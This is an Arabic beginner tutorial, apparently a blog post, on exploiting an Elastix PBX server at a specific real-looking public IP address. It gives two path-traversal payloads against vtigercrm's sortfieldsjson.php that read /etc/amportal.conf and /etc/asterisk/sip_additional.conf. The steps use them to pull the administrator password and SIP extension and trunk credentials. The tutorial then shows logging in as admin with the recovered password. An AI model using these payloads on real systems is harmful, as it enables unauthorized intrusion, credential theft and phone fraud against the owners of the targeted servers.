للمبتدئين شرح استغلال ثغرة Elastix

بسم الله الرحمن الرحيم
من خلال هذا الموضوع سوف أقوم بشرح بسيط لإستغلال تغرة Elastix
سوف نقوم بالشرح على هذا الايبي https://187.17.170.93/
حينما نقوم بنسخ ولصق الايبي من خلال المتصفح الفيرفوكس سوف تظهر لنا هذه الصفحة

https://www.drakola.com/up/uploads/1536276380591.jpg

هنا نقم بالضغط على أنا أتفهم المجازفة ثم نضغط على أضف استثناء ثم على اكد الاستثناء الامني كما في الصور

https://www.drakola.com/up/uploads/1536276380972.jpg

https://www.drakola.com/up/uploads/1536276381053.jpg

بعد ذلك سوف تفتح لنا صفحة Elastix وهنا يأتي دور الثغرة وهناك ثغرتين
الاولى: /vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php? module_name=../../../../../../../..//etc/amportal.conf%00 [^]
وهي لسحب باسورد الادمن حيث نقوم بوضع الثغرة خلف الايبي ثم اضغط انتر كما في الصورة

https://www.drakola.com/up/uploads/1536276635331.jpg

سوف تاتي لنا صفحة كهذه الصورة حيث نأخذ منها باسورد الادمن

https://www.drakola.com/up/uploads/1536276635482.jpg

بعد ذلك نقوم بفتح الايبي في صفحة اخرى ونقوم بتسجيل الدخول أما من خلال الصفحة مباشرة بوضع اليوزر admin والباسورد كما كان في الصورة ensite واذا لم تفتح الصفحة نقوم بوضع كلمة admin خلف الايبي فتاتي لنا نافذة تطلب اليوزر والباسورد ونقوم بوضعهما كما في الاولى

https://www.drakola.com/up/uploads/1536276635643.jpg

ويكون شكل الصفحة كالتالي

https://www.drakola.com/up/uploads/1536276748541.jpg

إذا لم تفتح معنا الصفحة نستخدم الثغرة الثانية وهي لسحب extention &Trunk عبر هذه الثغرة
/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php? module_name=../../../../../../../..//etc/asterisk/sip_additional.conf%00

https://www.drakola.com/up/uploads/1536276748622.jpg

أتمنى من الله أن أكون قد أفدتكم بشيء ولكم جزيل الشكر
والسلام عليكم ورحمة الله وبركاته

اترك تعليقاً

لن يتم نشر عنوان بريدك الإلكتروني. الحقول الإلزامية مشار إليها بـ *